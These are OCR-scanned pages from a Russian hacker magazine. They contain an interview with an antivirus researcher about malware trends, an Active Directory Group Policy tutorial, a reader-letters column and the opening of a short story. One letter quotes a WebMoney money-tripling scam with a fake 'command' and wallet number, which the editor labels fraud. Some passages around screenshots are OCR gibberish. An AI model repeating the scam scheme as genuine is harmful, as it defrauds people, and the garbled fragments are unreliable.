продукта. За год один человек не сможет написать антивирус уровня сегодняшних коммерческих про- 
дуктов. Если работать над ним годами, то, конечно, это реально, вот только выяснится, что антивирус- 
ная индустрия давно ушла вперед... 


ФОТО: ИВАН СКОРИКОВ 
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СПЕЦ: ОЧЕВИДНО, ЧТО АНТИВИРУС ВАЖЕН 
МЕНЬШЕ, ЧЕМ АНТИВИРУСНАЯ БАЗА, 
КОТОРУЮ ОН ИСПОЛЬЗУЕТ. КАКИМИ 
СПОСОБАМИ ПОПОЛНЯЕТСЯ 
АНТИВИРУСНАЯ БАЗА? КРОМЕ 
БАНАЛЬНОГО «СООБЩИЛИ, ПРОВЕРИЛИ, 
ДОБАВИЛИ». 


СПЕЦ: ПРИНЦИПИАЛЬНО ЛИ ТО, НА ЧЕМ 
НАПИСАНЫ ВИРУСЫ И ТРОЯНЫ? 


АЛЕКСАНДР ГОСТЕВ: Если бы мы сидели и ждали, пока нам сообщат о появлении нового вируса, мы 
бы уже давно утратили свои позиции мирового лидера по скорости реагирования и детектирования. Да 
и не заняли бы эту позицию, вероятно, вообще никогда. Антивирусные компании и так постоянно нахо- 
дятся в роли догоняющих в системе «снаряд-броня», так что вопрос о том, как максимально сократить 
время реакции, встал перед нами давно. И, судя по тому, что мы лидеры по этому показателю в анти- 
вирусной индустрии, нам действительно удалось решить этот вопрос. 

Мы используем разнообразные автоматические способы активного поиска новых вредоносных прог- 
рамм в Сети: и системы мониторинга сайтов, и системы раннего обнаружения вирусов в почтовом трафи- 
ке, и сети honeypot'oB. Очень помогает постоянный и тесный контакт с дружественными антивирусными 
компаниями как в деле обмена сэмплами, так и в совместном анализе или локализации инцидентов. В этой 
области у нас нет конкурентной борьбы, за деньги клиентов мы боремся другими, маркетинговыми спосо- 
бами. Есть у нас и так называемые «агенты», они же — добровольные помощники. Предвосхищая возмож- 
ный вопрос, скажу: нет, мы не покупаем вирусы у их авторов, хотя изредка такие предложения поступают. 


АЛЕКСАНДР ГОСТЕВ: Да нет, никакой особой разницы нет. Некоторые вещи бывает довольно трудно 
анализировать проводя реверс-инженеринг кода, но в 99% случаев для вынесения вердикта «вирус/не ви- 
рус» подробный анализ и не требуется. А если требуется, то мы в состоянии потратить на это чуть больше 
времени, чем обычно. Дело обстоит интереснее, когда нам попадаются вирусы для новых платформ или 
сред, например для Symbian или Windows Mobile. Там другой процессор, другие 
ассемблерные команды, другие форматы файлов. Приходится очень быстро и Александр Гостев 
достаточно глубоко внедряться в тему. Вот буквально сегодня разбирал троя- Магия 

нец для J2ME (Java для мобильных телефонов), узнал много интересного. 


АЛЕКСАНДР ГОСТЕВ: Для нас — нет. Даже наоборот. Когда есть какой-то конструктор/генератор ви- 
русов-троянцев, то число всех комбинаций возможных творений весьма ограничено. В основе все рав- 
но будут лежать одни и те же блоки кода (модуль размножения, модуль кражи данных, модуль отсылки 
данных). Это кирпичики, из которых кто угодно пытается собрать что-то эксклюзивное, а на деле полу- 
чается, что все подобные поделки имеют только внешние или незначительные отличия вроде имени 
файлов, адресов электронной почты и текстов MessageBox. Как следствие, нам для подобных вещей 
крайне просто создать эвристические анализаторы, которые помогут детектировать все варианты сра- 
зу. Поэтому довольно смешно выглядят люди, которые покупают генератор Pinch'en (популярный троя- 
нец-шпион) и надеются, что смогут с его помощью создать уникальный недетектируемый троян. 


АЛЕКСАНДР ГОСТЕВ: Сложно сделать такой прогноз. Если посмотреть, что происходило 20 или десять 
лет назад, выяснится, что никто не мог предполагать такого многообразия современных типов и классов ви- 
русов. Еще десять лет назад не было ни одного почтового червя, а сейчас эти программы уже успели пере- 
жить пик своего развития и находятся в стадии постепенного отмирания. Прорывы в умах вирусописателей 
случаются регулярно, это да. Проблема в том, что зачастую такие прорывы остаются «невостребованными» 
среди криминальных вирусописателей. Иногда навсегда, иногда до поры до времени. Возьмем, к примеру, 
троянские программы для игровых приставок, появившиеся осенью прошлого года. Да, троянцы есть. Да, на- 
носят вред пользователю. Однако на данный момент в их создании и распространении нет явной коммерчес- 
кой выгоды для вирусописателей. Ну что он украдет с приставки? Игру? ИХ и так навалом в Сети. Вот когда 
приставки начнут полноценно соединяться друг с другом, с сервисами интернета, вот тогда, возможно, на них 
и придется удар, причем неминуемый. Киберпреступность очень быстро реагирует на потенциальную выгоду. 

Если же говорить в целом о будущем, то на смену интернету как сети из компьютеров приходит 
новый мир. Мир мобильных устройств, которые будут соединяться друг с другом в самых разнообраз- 
ных сочетаниях: смартфоны, телефоны, КПК, приставки, фотоаппараты, плееры, холодильники, кофе- 
варки и все, что еще придумают. Не забывай и о бортовых компьютерах автомобилей, которые тоже бу- 
дут должны взаимодействовать со всем этим и с внешним миром. 

Ситуация изменяется очень быстро. Меньше двух лет прошло с момента появления первого червя 
для мобильных телефонов. Тогда многие скептически отнеслись к этому факту: ну, работает только на 
смартфонах с Simbian, распространяется через Bluetooth, соответственно, радиус заражения маленький, 
смартфонов мало, для запуска надо три раза нажать кнопку подтверждения. А что сейчас? Сейчас червь 
Cabir зафиксирован почти в сорока странах мира (это только подтвержденные данные). В Москве, если 
поездить с включенным Bluetooth в метро в течение дня, риск поймать СаЫг будет весьма и весьма высок. 

Дальше больше. Червь ComWar, рассылающий себя через MMS. Написан в России меньше года 
назад. Сейчас насчитывается более 20-ти стран, «зараженных» этим червем, причем в некоторых стра- 
нах его распространение действительно носит эпидемиологический масштаб. Что будет дальше, преду- 
гадать нетрудно, тем более если мы учтем дальнейшее развитие смартфонов и растущую долю этих те- 
лефонов на рынке. 

Bluetooth и ММ$-черви — главная угроза будущего и почва для глобальных эпидемий. Во сколько 
раз число владельцев телефонов превосходит число пользователей компьютеров, ты, наверное, тоже 
хорошо представляешь себе. 

А еще есть риск появления \\/-Е-червей. Подробно раскрывать «потенциальный» принцип их 
действия я не хочу, чтобы не стимулировать умы вирусописателей, но... В общем, все только начинается. 


АЛЕКСАНДР ГОСТЕВ: Война машин и людей, конечно — фантастика. Однако «умные» устройства бу- 
дут доставлять проблемы, но не сами по себе, а в результате действий людей-злоумышленников. Проб- 
лемы могут быть самые разные. Начиная тем, что твоя кофеварка получит «неправильную» SMS'ky и 
уничтожит весь запас зерен, заканчивая случаем, когда бортовой компьютер автомобиля в ходе DoS- 
атаки на него решит, что идет попытка угона, заблокирует двери и отправит сообщение в полицейский 
участок. И неважно, что ты в этот момент, например, находишься в салоне и едешь по трассе... A 


ОФФТОПИК 


soft 


ADMINING: р 
НАСТРОЙКА ДОМЕННОЙ 
ПОЛИТИКИ БЕЗОПАСНОСТИ 


ПРОШЛЫЙ ВЫПУСК ЗАПИСОК ЗАКОНЧИЛСЯ НА ПРИЗЫВЕ БЫТЬ СНИСХОДИТЕЛЬНЫМ К ПОЛЬЗОВАТЕЛЮ, ОДНАКО 
Я СОВСЕМ HE ПРИЗЫВАЛ ПОТВОРСТВОВАТЬ ВСЕМ ЕГО ПРИХОТЯМ. ПРОСТО ОБЪЯСНЯИ, КАК ВЕСТИ СЕБЯ В 
ЦИФРОВОМ МИРЕ ПРАВИЛЬНО, ЧТОБЫ ВСЕМ ЖИЛОСЬ ЛЕГКО И СПОКОИНО. НЕ БОИСЯ УЧИТЬ ПОЛЬЗОВАТЕЛЯ, 
ЧАСТО ОН ТВОРИТ БАРДАК НЕ СО ЗЛА, А ПО НЕЗНАНИЮ. БУДЬ МУДР И СПРАВЕДЛИВ. САМЫЙ ПРОСТОИ СПОСОБ 
ИЗБЕЖАТЬ НЕПРИЯТНОСТЕИ — В КОРНЕ ПРЕСЕЧЬ ВСЕ ИХ ВОЗМОЖНЫЕ ПРИЧИНЫ. ПРОДОЛЖИМ ЗАНИМАТЬСЯ 


n Р И Ч И НАМ И [АЛЕКСАНДР ПРИХОДЬКО (SANPRIH@MAIL.RU) 


в т Ste [нс а” ery ol Г ed ey 
Прежде чем выходить на тропу войны с неблагона- Новый OU 
дежными пользователями, настроим рабочие ие ena = 
. : -- аб Faas QT ae 
СРО. Для начала подключим к каждой рабочей группе диск. Разграничение 
С Se Пан вт Сони emma ey 11 abe 
доступа на диск мы делали раньше — теперь автоматизируем процесс. CO3- |+ `узаынинвя 
даем OU для наших групп: «Начальство», «Бухгалтеры», «Экономика». Имя |= ЕР" ‘=. 
OU и группы не должны полностью совпадать. 
Оснастка Active Directory Users and Computers, правая кнопка мыши на 
имени домена > New + Organizational Unit. 
Открываем Group Policy Management. Либо через консоль, которую ты, 
надеюсь, сохранил, либо правой кнопкой мыши на имени домена (оснастка 


Бели. 


Е es = 
Conta тов fer eer, 
Cd il ЕТ 
File pore ome ye 

т too ope 


_j form 1 
Sa : bala помои te west 


Active Directory Users and Computers), идем в Properties - закладка Group Lien | Te haste pecan coed 
Policy > Open. Теперь приготовим скрипты для автоматического подключения ai here Del aul corde te dla, 
сетевых дисков. ‚- ети fare пели Some 

Создадим Ha диске С: папочку и назовем ee «Scripts». Определимся с сете- atom, 
выми ресурсами. Скорее всего, у тебя есть сетевые ресурсы, нужные абсолютно =i 
всем твоим пользователям. Имеет смысл подключить их на уровне домена. ление 

Вот, к примеру, обменный диск, в котором каждый может творить что гы 


угодно. Назовем диск «О:». 


Перед началом работы немного отвлекусь и предложу тебе для каждой я а ИИ 
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Работа скрипта 


Подключение 
скрипта 


Выбранный скрипт 


лер домена и считывает две политики. Первая политика накручивается на 
сам компьютер (Computer Configuration), вторая — на пользователя (User 
Configuration). Скрипты можно прописывать в обеих политиках. 

Делаем следующее. Те задачи, которые необходимо накрутить на всех 
пользователей домена, прописываем в Default Domain Policy. Я, например, ви- 
жу немного таких задач: политика паролей, политика неудачных входов, наст- 
ройка прокси-сервера, подключение общей шары и политика аудита. Я про- 
писываю еще стартовую страницу в Internet Explorer, чтобы неопытный поль- 
зователь при запуске IE мог почитать хоть что-то. 


Неправильная 


Еще один совет — стараться не делать ничего 
глобального Ha Default Domain Policy, иначе 
при неправильной настройке политики поиме- 
ешь работоспособный домен, в который не сможет попасть даже админ, 
то есть ты. Достаточно запретить всем локальный вход на контроллер 
домена — и ты попал. Впрочем, это уже тонкости. «Продолжаем разго- 
вор», как говаривала первая система охлаждения — Карлсон. Подклю- 
чаем наш сетевой диск на все компьютеры домена. Открываем Group 
Policy Management + Computer Configuration - Windows Setting — Scripts 
(Startup/Shutdown). 

Далее двойной щелчок мышью Ha startup’e, открывается окно Startup 
Properties. Параллельно открываешь папку Scripts на диске C:, выделяешь 
свой файл «Обмен.Ба{, далее магический пасс <Ctrl>+<C> (для тех, кто не 
понял: это было копирование). 
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Переходишь в окно Startup Properties, нажимаешь 
кнопку Show Files и попадаешь вглубь папки группо- 
вой политики. Здесь нажимаешь <Ctrl>+<V>, то есть 
вставляешь скопированный ранее файл. Нажима- 
ешь кнопку Add в окне Startup Properties — перед тобой открывается окно Add 
a Script > Browse. Открылась папка, там уже лежит скрипт. Выбирай его. 

Далее необходимо обновить политику безопасности. Сделаем это ко- 
мандой: «Gpupdate /force». Теперь посмотрим, как наша политика отработа- 
ла на машине какого-нибудь пользователя, например Балаганова. 

Уже хорошо! Теперь учимся смотреть, что именно накрутилось на 
компьютер пользователя (на случай проблем с применением политики): на 
компьютере, политику для которого ты читаешь, необходимо выполнить ко- 
манду «gpresult». 

Вот, к примеру, компьютер Балаганова. Кнопка «Пуск» + «Выполнить» > 
«cmd», набираем «дргезий». В длинном открывшемся списке будет два типа 
информации: «Конфигурация компьютера» и «Конфигурация пользовате- 
ля». Пока и там и там применена только Default Domain Policy. Теперь зай- 
мемся политиками наших, ранее созданных OU. Балаганов входит в группу 
«Бухгалтерия». Возьмем пользователя Балаганов и перетащим его в OU 
«Бухгалтеры» (процесс переноса пользователя в OU выполняется в Active 
Directory Users and Computers). Создадим скрипты для наших рабочих групп. 
Диск С:, каталог Scripts, правый мышиный щелчок на файле «O6meH.bat» > 
Copy, на пустом месте каталога Scripts правой кнопкой мыши -+ Paste. Полу- 
чили файл с именем «Copy of Обмен.ра». Переименовываем его в файл 
«Byxrantepua.bat». 

Открываем Гагом и заменяем слово «обмен» словом «бухгалтерия». 
Сохраняем. Кстати, еще меняем букву диска, например вместо О: — H:. 
Несколько дисков под одной буквой не подключатся. Теперь необходимо 
создать политику для подключения диска для группы «Бухгалтерия». Откры- 
ваем нашу консоль, правой кнопкой Ha Group Policy Object > New. И пишем: 
«Бухгалтерия». 

Начинаем править вновь созданный объект: правая кнопка мыши на 
объекте GPO «Бухгалтерия» > Edit. Так как нам необходимо, чтобы данная 
политика применялась к пользователю Балаганов и членам его группы, мы 
правим скрипт в User Configuration. 

Открываем User Сопйдигайоп -+ Windows Setting > Scripts (Startup/Shu- 
tdown). Как подключить файл скрипта к объекту политики, рассказано на 
этаже выше. Скрипт подключили, GPO Editor закрыли. Теперь настоим об- 
ласть распространения данной политики. В консоли видно, на кого сейчас 
распространяется данная СРО. 
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| Теперь изменим ee. Выбираем Authenticated Users > 
| i) кнопка Remove, добавляем новую область pacnpo- 
странения: кнопка Add, в открывшемся окне вруч- 
ную набираем слово «Бухгалтерия» и нажимаем 
ОК. Осталась самая малость — отключить ненуж- 
ную ветвь политики, которая относится к настрой- 
кам компьютера. Переходим на закладку Details и 
в поле GPO Status выбираем значение «Computer 
configuration settings disabled». Теперь закладка 
Settings покажет результаты твоего труда. 
Последнее шаманское действо — это при- 
вязка вновь созданной политики к существующе- 
му OU. Вновь в той же консоли правая кнопка мы- 
ши на OU «Бухгалтеры», в меню выбираем пункт 
Link an Existing СРО... В открывшемся списке дос- 
тупных политик выбираем нашу — «Бухгалтерия». 
Теперь заставим контроллер домена форсированно 
обновить политики: Gpupdate /force. Перезагружаем 
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машину Балаганова и смотрим, что получилось. 
Получилось то, что и планировали. Теперь ты 
проделываешь аналогичные операции со всеми 
своими группами. Для каждой группы пишешь свой 
скрипт, создаешь свой OU, создаешь свой GPO, 
привязываешь СРО к ОЧ, обновляешь политику в 
домене и получаешь автоматическое подключение 
сетевых ресурсов любому пользователю в домене. 
Если захочешь не по-детски напугать свое началь- 
Область ство, то на очередной вопрос «Чем вы заняты?» 
распространения быстро произноси предыдущее предложение. 
СРО Еще одно замечание. Все пользователи, вхо- 
дящие в какой-либо OU, должны иметь право Ha чте- 
ние и применение политики. Главное — чтобы ты по ошибке не внес учетную за- 
пись Администратора в любое OU, где бы на Админа могла бы примениться по- 
литика. Рекомендую придумать учетную запись, сделать ee Enterprise Admins и 
проконтролировать то, чтобы на эту учетную запись не распространялось 
действие изобретенных тобой политик. Что именно применяется к определен- 
ной учетной записи, просматриваем через Group Policy Management > заклад- 
ка Delegation > кнопка Advanced. Тут выбираешь нужную запись и смотришь, 
что имеется в наличии. Как видишь, учетная запись Enterprise Admins может соз- 
давать и удалять объекты, но политика на нее не применяется, так как сброшен 
флаг в none Apply Group Policy. Таким образом, мож- 


Готовая GPO но создавать политику под каждую конкретную за- 

«Бухгалтерия» дачу и накручивать ее вплоть до отдельного пользо- 
вателя, но об этом чуть позже. 

Отношение учетной Все то, что я так долго рассказывал тебе, 

записи к политике намного быстрее выполняется вручную. Главное — 


понять идею. Подведем итог: на уровне контролле- 
ра домена с помощью политики мы будем устанав- 
ливать сильно ограниченное количество значений, 
политику паролей, аудита, подключение общих 
для всех пользователей домена ресурсов. Все ос- 
тальное, что необходимо делать на уровне домена, 
проделывается через отдельные объекты СРО. Ду- 
маю, после того как ты проделаешь все это для 
своих групп, твои вопросы о способах создания 
политик навсегда отпадут и ты оценишь инстру- 
менты, которые есть у тебя в руках. 

В следующий раз доведем до логического за- 
вершения настройку Default Domain Policy, посмот- 
рим действие политики аудита, настроим за один раз 
всех пользователей интернета, рассмотрим способ 
моделирования полити- 
Подключенные диски ки. В общем, нам будет 
чем заняться 
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ПО ВСЕМ ВОПРОСАМ, СВЯЗАННЫМ С ПОДПИСКОЙ, ЗВОНИТЕ ПО 
БЕСПЛАТНЫМ ТЕЛЕФОНАМ: 780-88-29 (ДЛЯ МОСКВИЧЕИ) . 

И 8-800-200-3-999 (ДЛЯ РЕГИОНОВ И АБОНЕНТОВ МТС, БИЛАИН, 
МЕГАФОН). ВСЕ ВОПРОСЫ ПО ПОДПИСКЕ МОЖНО ПРИСЫЛАТЬ 


НА АДРЕС: info@glic.ru 


ОФФТОПИК 


crew 


Е-МЫЛО 


ПИШИТЕ ПИСЬМА! 
SPEC @REAL.XAKEP.RU |НА ПИСЬМА ОТВЕЧАЛ SKYWRITER 


ОТ: flex-mx [Нех-тх @ yandex.ru] 

ТЕМА: есть мнение 

Превед, хакеры! 

Очень нравится ваш журнал. Я его в туалете обычно читаю, даже сделал там 
специальную полочку. Ваш журнал настраивает на работу :), на новые дости- 
жения :). Когда я читаю ваш журнал, мне хочется больше. Правда, мне мама 
его редко покупает из-за того, что там голые тетки нарисованы. Но я в столо- 
вой экономлю и на ваш журнал накапливаю :). Мама мне запрещает ваш 
журнал долго читать — бьет тапочком, а иногда линейкой. Так что вы его по- 
меньше делайте, чтобы спрятать быстро можно было :). 

Ну, ладно, теперь серьезно. Хороший журнал делаете. Особенно понра- 
вились номера про е-топеу и передовое программирование. Продолжайте в 
том же духе. И не верьте никому, кто говорит, что у вас плохой дизайн. Чер- 
ный текст на белом фоне, подсветка кода, поясняющие иллюстрации — вот 
все, что нужно. Четко и ясно, без пафоса. Есть предложение комплектовать 
Спец DVD-guckom, когда есть, что туда положить, конечно. 

А вот истории в конце мне не нравятся. Чушь. Писал пациент психбольни- 
цы. Аффтар выпей яду. Прочитал на 83 странице апрельского Спеца: «... способ- 
ны не вставать из-за компьютера, проводить сутки за ним...» Посылаю вам об- 
ложку книги, которая должна помочь этим несчастным (не обложка, а книга). 

П.С. (что с греческого значит: «смотри ниже, чувак») Хотел серьезно, 
но не получилось. 

П.П.С. (что с греческого значит: «смотри еще ниже, чувак») Люблю слу- 
шать группу ДДТ. Особенно ранние песни. Слышали песню «Мы из Уфы»? 
Нет, тогда послушайте. 

П.П.П.С. (ну вы поняли) А мамка-то ваша знает, чем вы тут занимаетесь? :) 


ОТВЕТ: Буду оригинальным и скажу тебе «привет» вместо привычного «превед» :)! 
Знаешь, по-моему, наши чувства взаимны. Мне тоже очень понравилось твое 
письмо, и (не поверишь) я тоже читал его в туалете, держа комп на коленях. 
Со смеху даже чуть не уронил его ;( — ты бы был виноват. 

А мама твоя зря на журнал бутылки катит: теток голых мы в нем боль- 
ше не рисуем, если только АЗС!-графикой иногда. Но если и без теток OH ма- 
му устраивать не будет, мы сделаем специальную 
маскировочную суперобложку «а-ля Мурзилка» - с 
медведом в шарфе, воздетыми к небу руками и 
всеми атрибутами, присущими этому существу. 
Так что жди нового Спеца! Кстати, этот выпуск бу- 
дет специально для тебя бесплатным, чтобы спа- 
сти тебя от голодной смерти без столовой. 

Ах да! Историю в конце этого номера мы вы- 
полним в виде комикса «Приключения Самодел- 
кина» (у него такие умелые ручки :)). 

З.Ы. А вот мальчик из интернета прислал 
нам на передачу креатифф, который мы оценили 
и решили обязательно опубликовать, чтобы наши 
маленькие любители C++ видели, что им грозит! ;) 


ОТ: Робот [Робот @yandex.ru] 
ТЕМА: Не оставьте без ответа! 
Привет, Хакеры! Ответьте, пожалуйста, на один вопросик. Я сейчас создаю 
сайт в зоне .сот, на котором буду предоставлять услуги иностранцам. С помо- 
щью каких платежных систем им будет максимально удобно платить, а мне — 
без проблем получать деньги? Никогда с этим не сталкивался, поэтому спра- 
шиваю у специалистов. Я живу в России. 

Заранее спасибо, Виталий. 


ОТВЕТ: Здравствуй, Робот! Недавно был на сайте твоего коллеги, он электрон- 
ную валюту меняет. Тяжелая, наверное, работа... Ладно, о чем это я? Ах да! 
Ситуация у тебя, Виталий, прямо сказать, сложная. Дело в том, что, не- 
смотря на всю компьютеризованность западных стран, товарищи иностранцы 
не очень любят электронную валюту. По крайней мере, не очень любят прово- 
дить какие-то более-менее серьезные операции с ней. Единственной, пожа- 
луй, распространенной электронной валютой можно назвать PayPal — так Ha- 
зываемую «палку». Однако есть и один «минус»: воспользоваться ей в России 
будет крайней проблематично. Дерзай, короче говоря, на Www-paypal.com, 
Второй вариант. Возможно, стоит взглянуть на электронную систему Е- 
gold. Иностранец относительно несложно переведет в нее кровные гульдены. 
Третьим вариантом - для крупных сумм - может стать Wire, то есть теле- 
графный перевод, но едва ли ты найдешь иностранца в здравом уме и памя- 
ти, который решился бы перевести таким способом деньги тебе в Россию. 
Как видишь, с электронным бизнесом нынче сложно. Ну а кто говорил, 
что будет легко?.. Удачи, Виталий. 


ОТ: серый kirya [serg_sk8 @bk.ru] 

ТЕМА: Хэлп 

ХАЙ, уважаемый журнал! Хотел бы попросить вас помочь мне понять, как 
можно ламануть пароли персов в новой онлайн игре 
me.ru/?rf=537069726974) Заранее сенк. 


(http://megaga- 


ОТВЕТ: Здравствуй, Сергей. ЛАМАНнуть — это ты правильно сказал, но, к CO- 
жалению, сайт оказался недоступным? Может, ты ссылочку неправильную 
дал? Или за чужой счет решил хитов накрутить? Я не знаю. 

Огромная просьба к господам читателям: не слать нам вирусы, трояны 
(особенно общеизвестные, они отсекаются еще до попадания в наш ящик), 
ссылки с просьбой взломать что-то — мы журналисты, а не преступники. 
И не рекомендуем вам преступниками становиться. Успеха в онлайн-играх. 


ОТ: Саша Бобриков!!! [niitro2006 @ гатЫег.ги] 

ТЕМА: RAR 

Здравствуйте, уважаемая редакция журнала СпецХакер!! 

Обращаюсь к вам со следующей просьбой-вопросом: как можно взломать 
ААВ-архив Ha WinRAR v 3.30? 


Пробовал искать в интернете, но кроме RAR Password Cracker v4.12 и 
Advanced RAR Password Recovery 1.53 ничего не нашел. Но они так медлен- 
но работают, что совсем худо. Может, что-то пошустрей существует? 

Р.$. Если не секрет, какой Key Ha RAR Password Cracker v4.12? 


ОТВЕТ: Здравствуй, Бобриков! 
Хочу тебя расстроить. Ты все правильно делал: ставишь программу восста- 
новления паролей и ждешь. Ходят слухи, что Ha Pentium 133 восьмибуквен- 
ный пароль можно взломать раньше, чем солнце сбросит свои внешние газо- 
вые оболочки, подготавливаясь к взрыву или рассеиванию. 

Р.$. Пошустрее делается проще: апгрейдом :). 

P.P.S. Ключ к RAR Password Cracker легко получается подбором при по- 
мощи программы RAR Password Cracker Cracker. 


OT: Evgen [devgena @atnet.ru] 

ТЕМА: под писка 

Здравствуйте, журнал Хакер! 

С какой периодичностью выходит Хакер Спец и бывает ли он с DVD? Хочу 
подписаться, но не знаю, как правильно оформить подписку. До свиданья. 


ОТВЕТ: Привет! 

«Хакер Спец» — ежемесячный журнал. Пока OH не выходит с DVD, но, по 
всей видимости, скоро будет, так что тебе осталось ждать недолго. Что каса- 
ется подписки, где-то на обложке журнала указан бесплатный телефон, по 
которому тебе подробно расскажут о подписке (780-88-29 для москвичей и 8- 
800-200-3-999 для жителей регионов). К сожалению, нет возможности цити- 
ровать все уже сказанное. Милости просим! С уважением, твоя команда. 


OT: Hadley Kim [1moosehea @ accesswave.ca] 

ТЕМА: Осторожно! 

Осторожно — лохотрон! Дорогие друзья, коллеги. Я обращаюсь ко всем вам 
за помощью. Помогите отомстить! 

Меня опрокинули на $480 следующим образом: найдя в форуме статью 
следующего содержания: «...Некоторые фирмы открывая в системе Web- 
Мопеу так называемые балансовые счета, при этом допускают ошибки в 
своих программах. Если на такой счет прислать деньги с определенной ко- 
мандой в рамке "ПРИМЕЧАНИЕ", то этот счет автоматически отправит обрат- 
но УТРОЕННУЮ сумму...» 

Я не поверил, но ради спортивного интереса послал сколько не жалко 
(всего 3 WMZ), и был искренни удивлен, когда через 2 часа получил обрат- 
ный перевод в виде YWMZ, закинул еще 15$ и утром обнаружил пополнение 
в виде 45$ на своем счету. Осмелев, я кинул им все — и (правильно) тиши- 
на. 480-36=444$ — нехилая прибыль? Понятно, как они работают! 

Сначала никто много не пошлет. Вот они и отдают деньги, чтоб люди 
осмелели. А потом, когда человеческая жадность берет верх над осторожно- 
стью, они и отбивают свои бабки и при этом срывают неплохой куш, а это 
очень обидно, поверьте. 

Собственно, план мести: 

Если аккуратно слать им небольшие суммы с разных кошельков, то 
можно их обанкротить. 

Вот этот кошелек: 7123456789012 ОБЯЗАТЕЛЬНО. В рамке «ПРИМЕЧА- 
НИЕ» надо обязательно написать 

«INPUT type=wey checkd value=BALANCE 3 input 7888888888888» 

вместо 7888888888888. Естественно, пишем свой номер кошелька!!! 

Можно безнаказанно послать четыре перевода по 7 WMZ или два по 15 
WMZ на этот кошелек и заработать максимум из возможных 60 WMZ. He пе- 
речисляйте сразу много. Надеюсь на Вашу поддержку, Николай Вассатеев. 


ОТВЕТ: Здравствуй, Коля-Николай! 

Поразительна сила человеческой глупости и до- 
верчивости. Нас очень огорчает, что тебя так не- 
щадно обидели и практически разорили. Я как-то 
дал в долг одному бездомному свою зарплату, он 
обещал вернуть вдвое больше через неделю. Уже 
четыре года прошло, а его все нет! Когда вернет, я 
куплю себе новую BMW! Вот жду момента. 

Что до описанных тобой схем, то это класси- 
фицируется не иначе как мошенничество, если я 
не ошибаюсь с высоты своего мизерного юридиче- 
ского опыта. Причем обе схемы: и то, что якобы 
проделали с тобой, и то, что ты собираешься про- 
делать с остальными. Учись терминологии: «граж- 
данин начальник», «феня» и т.п. 


ИГИАА „— 
430 


OT: binar [d_dimon06 @mail.ru] 

TEMA: не указана 

Здравствуйте, редакция. Предлагаю сделать жур- 
нал чуть проще. 

А именно: выделить в конце емких статей па- 
ру строчек с заголовком вроде «Литература». Для 
кого это надо? Для тех, у кого нет шансов разо- 
браться не прочитав поподробнее. 


ОТВЕТ: Алоха, двоичный. Мы не будем упрощать 
журнал, но обязательно добавим список использо- 
ванной литературы, литературы для справок, разъяс- 
нение терминов и проч.! Сделаем мир светлее! 


ОТ: kirill cheb [kir_cheb @ua.fm] 

ТЕМА: Нужен совет... 

Здравствуйте. Я слышал, что каким-то образом можно получить текст (исход- 
ники) скрипта на Perl/PHP, а не результаты его работы. Прошу Вашего сове- 
та по этому вопросу. Благодарю. С ув. Ваш читатель. 


ОТВЕТ: Так. Давай с самого начала. 

Результат работы скрипта получается так. В каком-нибудь Midnight Comman- 
der’e наводишь на него курсор и давишь <Ещег>, скрипт запускается. Теперь 
в том же Midnight Соттапаеге снова наводим курсор на скрипт и жмем... — 
барабанная дробь! — нет, не <Enter>, а <F3>. И видим исходник! Все просто! 


OT: Vadim Baturov [baturov @rambler.ru] 
ТЕМА: просьба 
Увидел ваш журнал №3/2004, посвященный Win ХР (в архиве на PDF). 
При распечатке некоторых статей «картинки» просто нечитаемые. 
А главное, журнал выходил с CD. Теперь вопрос. Возможно ли получить 
данный журнал в бумажном виде вместе с СО? 
Заранее благодарен, Вадим Батуров. 


ОТВЕТ: Вадим. Представляешь, мы днями и ночами трудимся, пишем, ищем 
авторов, придумываем дизайнерские решения, да много чего. И нам платят, 
чтобы мы кушали хлебушек, пока трудимся. А откуда эти денежки берутся? 
Правильно, журнальчик продают, и получаются денежки. И маленькую их 
часть отдают нам. A если все скачивают журнальчик в формате PDF, мы ку- 
шаем меньше. Отсюда вывод. Если тебе действительно нравится то, что пи- 
шут в журнале, если ты находишь там полезную информацию, просто подпи- 
шись, и у тебя будет все: и картинки, и CD... Ждем тебя в рядах наших под- 
писчиков A 
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БУКЕТ ДЛЯ БАРМЕНШИ 


Поздравляем нашего уважаемого любимейшего автора 
niro с юбилейной Story! Огромное ему спасибо за то, что 
он освещает нашу жизнь своим творчеством и дарит нам 
волшебные минуты чтения! Так держать! 


В ЭТОТ ДЕНЬ СЕРЕГЕ МАЛЫШЕВУ БЫЛО ОХ КАК ТЯЖКО СМОТРЕТЬ НА ВСЕ 
ВОКРУГ И ПОНИМАТЬ, ЧТО ВЕСНА, КОТОРАЯ НАКОНЕЦ-ТО ПРИШЛА В МОС- 


КВУ, ЯВНО НЕ ДЛЯ НЕГО |NIRO (NIRO@REAL.XAKEP.RU) 


Кусая губы, он сидел на скамейке возле памятника Пушкину и держал на KO- 

ленях сумку с ноутбуком, а в руке — банку ледяного пива. Сам того не заме- 
чая, он отхлебывал из банки, постепенно замерзая, но ему было все равно. 

Катя не пришла. 

Он, если честно, особенно и не верил в то, что эта красавица фотомо- 
дель придет на встречу с ним, но надежда умирает последней. И она слабе- 
ла все больше с каждым глотком пива из банки. 

Сергей смотрел куда-то прямо перед собой, временами обводя пло- 
щадь перед кинотеатром «Россия» туманным взглядом и не замечая расцве- 
тающей природы. Пальцы свободной руки рисовали на сумке какие-то значки, 
обводя пряжки и швы. На скамье вместе с Сергеем замерзал букет гвоздик... 

Рядом с ним нежно и красиво обнималась пара: девушка, прильнув к 
своему парню, что-то шептала ему на ухо, временами целуя в щеку. Парень 
улыбался и подставлял лицо весеннему солнцу, прищуривая глаза. Его рука 
лежала на талии подруги и явно собиралась нырнуть под куртку, благо вокруг 
Москва и никому нет дела до целующейся парочки, одной из тысячи в этом 
сквере. Малышев, хотя никогда не отличался завистливостью, вдруг остро 
ощутил свое одиночество и желание оказаться на месте этого парня. 

Но он не мог. Это было не в его силах. 

Так же, как он не мог заставить Катю внезапно появиться сейчас здесь, 
рядом с ним, чтобы принять букет гвоздик. Она опоздала уже на два с поло- 
виной часа, и Малышев понимал, что слово «опоздание» тут вряд ли уместно. 
Ее не будет ни сегодня, ни завтра. 

В голове сквозь пивную пелену пытались прорваться какие-то баналь- 
ные объяснения типа «заболела», «пробки», «мама не пустила» и прочая 
чушь, но обмануть себя он не мог. Катя была птица совершенно другого по- 
лета, и Сергей, собираясь сегодня на свидание, где-то в глубине души был 
уверен, что ничего не получится. 

А мысли имеют свойство притягивать к себе события и поступки. 

Поэтому она не пришла. 

Запрокинув голову, он попытался выдоить из банки еще пару капель, но 
понял, что она опустела окончательно и бесповоротно. Смял ее рукой с про- 
тивным скрежетом. Парочка рядом с ним вздрогнула и обернулась. 

